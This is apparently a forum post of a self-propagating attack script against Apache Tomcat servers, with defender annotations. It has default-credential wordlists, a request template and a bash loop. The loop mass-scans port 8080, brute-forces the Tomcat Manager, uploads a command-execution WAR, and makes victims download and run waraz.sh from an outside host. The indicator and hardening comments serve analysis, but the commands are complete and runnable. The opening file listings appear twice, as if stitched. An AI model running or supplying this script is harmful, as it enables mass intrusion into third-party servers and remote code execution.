soosef
file: username.txt
root
role
admin
tomcat
test
user
file: password.txt
password
adminadmin
admin
tomcat
test
user
file: my_req
GET /manager/html HTTP/1.1
Host: %d
Connection: close
User_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
file: scan.sh
Bash:
file: username.txt
root
role
admin
tomcat
test
user
file: password.txt
password
adminadmin
admin
tomcat
test
user
file: my_req
GET /manager/html HTTP/1.1
Host: %d
Connection: close
User_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
file: scan.sh
Bash:
Code:
#!/bin/bash
# scan.sh as posted, annotated for analysts and defenders; every command below
# is unchanged. The script is an unattended loop with four stages: port-8080
# discovery, filtering for Tomcat Manager endpoints that answer 401, default
# credential attempts with a WAR upload, and remote execution of a downloaded
# shell script through the uploaded JSP.
#
# Indicators that can be read directly from this listing and its companion files:
#   - GET /manager/html with the malformed header name "User_Agent:" (underscore
#     instead of hyphen) and the fixed Chrome/55 string from my_req
#   - bursts of HTTP 401 on the manager path from one source: 6 usernames x
#     (6 passwords + 1 attempt without -P) = 42 attempts per host
#   - a deployed application answering at /jsp_app/cmd.jsp, receiving POSTs
#     with a "cmd=" form field
#   - outbound HTTP to darklings.duckdns.org for /waraz.sh
#   - /var/tmp/wazrrrzin.sh (and wazrrrzin.sh.1) created, made mode 777, run, deleted
#
# Hardening that breaks this chain: remove the manager webapp or restrict it
# (for example with a RemoteAddrValve), keep no default or guessable accounts
# in tomcat-users.xml, alert on unexpected WAR deployments, and filter egress
# from application servers.

# Endless loop: the whole pipeline repeats until the process is killed.
for (( ; ; ))
do
# If no *.zone file is present, a set of them is fetched from a chat CDN.
# They are passed to zmap -w below, so presumably they hold address ranges
# (the names suggest a cloud provider) - contents are not shown on the page.
if ls *.zone &>/dev/null
then
echo "Found."
else
wget https://cdn.discordapp.com/attachments/716135473373773854/793328005635244032/amazon.zone -O slaaaa.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793353236819083274/1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360506889961522/amazon_1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360510225350666/amazon.zone -O slaaaaa.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360512590807040/ama.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360513261109278/amazon_2_1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360515728015380/amazon_2.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360516725997608/1_1.zone
fi
# Clears intermediate files left over from a previous pass.
rm -rf ok.csv result.txt tom.txt tom2.txt file.txt done1.txt supra.txt up.txt l
# One pass per zone file; each zone file is deleted after it has been scanned,
# so the download branch above runs again once all of them are consumed.
for i in *.zone
# Stage 1 - discovery: zmap probes TCP 8080 for the ranges in the zone file and
# writes responders to file.txt. Seen from the network this is a high-rate
# single-port sweep.
do zmap -p 8080 -w $i -o file.txt -i eth0 -B35M
pkill -9 zmap
rm -rf $i
# Stage 2 - fingerprint: zgrab sends the my_req template (GET /manager/html)
# to each responder and records the replies in ok.csv.
zgrab --port 8080 --input-file file.txt --data my_req --output-file ok.csv
pkill -9 zgrab
rm -rf file.txt
# Keeps only replies that mention both "Tomcat" and "401", i.e. a manager
# endpoint that exists and asks for authentication.
cat ok.csv | grep "Tomcat" | grep "401" >> l
# Double quotes are turned into spaces so awk can take the fourth
# whitespace-separated field (presumably the address - depends on zgrab's
# output layout, which is not shown here).
tr '"' ' ' < l > supra.txt
rm -rf l ok.csv
awk '{ print $4 }' supra.txt >> done1.txt
# w00t3r.py is not on the page; the script only shows that it reads done1.txt
# and that the second field of its result.txt is collected into tom.txt.
python w00t3r.py -h done1.txt -p 8080 -m 50 -t 10
awk '{ print $2 }' result.txt >> tom.txt
rm -rf result.txt done1.txt supra.txt
# Stage 3 - credential attempts: for every entry in tom.txt the external tool
# tomcatWarDeployer.py (not shown) is called with each username from
# username.txt against each password from password.txt, plus one call without
# -P, always with cmd.war as the file to upload. Each call is capped at 60 s.
# In Tomcat access logs this appears as a run of 401s on the manager path
# followed, when a pair is accepted, by a deploy request.
while read -r line
do
timeout 60 python tomcatWarDeployer.py $line -U admin -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -f cmd.war
done < tom.txt
# Builds one URL per tom.txt entry: slashes become spaces, the second field is
# taken as host[:port], and /jsp_app/cmd.jsp is appended. The script does not
# check whether any upload succeeded, so every candidate is contacted.
tr '/' ' ' < tom.txt > tom2.txt
awk '{ print "http://"$2"/jsp_app/cmd.jsp" }' tom2.txt >> up.txt
rm -rf tom.txt tom2.txt
# Stage 4 - execution: six POSTs per URL, each carrying one command in the
# "cmd" form field. In order they fetch waraz.sh (once with curl, once with
# wget) into /var/tmp/wazrrrzin.sh, make it mode 777, run it with sh, and
# delete it together with a ".1" duplicate. Because the file is removed, disk
# triage may find nothing; web access logs, process telemetry (the Tomcat JVM
# spawning sh, curl or wget) and DNS/proxy logs for the download host are the
# more reliable evidence.
while read -r lineup
do
timeout 30 curl --data 'cmd=curl http://darklings.duckdns.org/waraz.sh -o /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=wget http://darklings.duckdns.org/waraz.sh -O /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=chmod 777 /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=sh /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=rm -rf /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=rm -rf /var/tmp/wazrrrzin.sh.1' $lineup
done < up.txt
rm -rf up.txt
done
done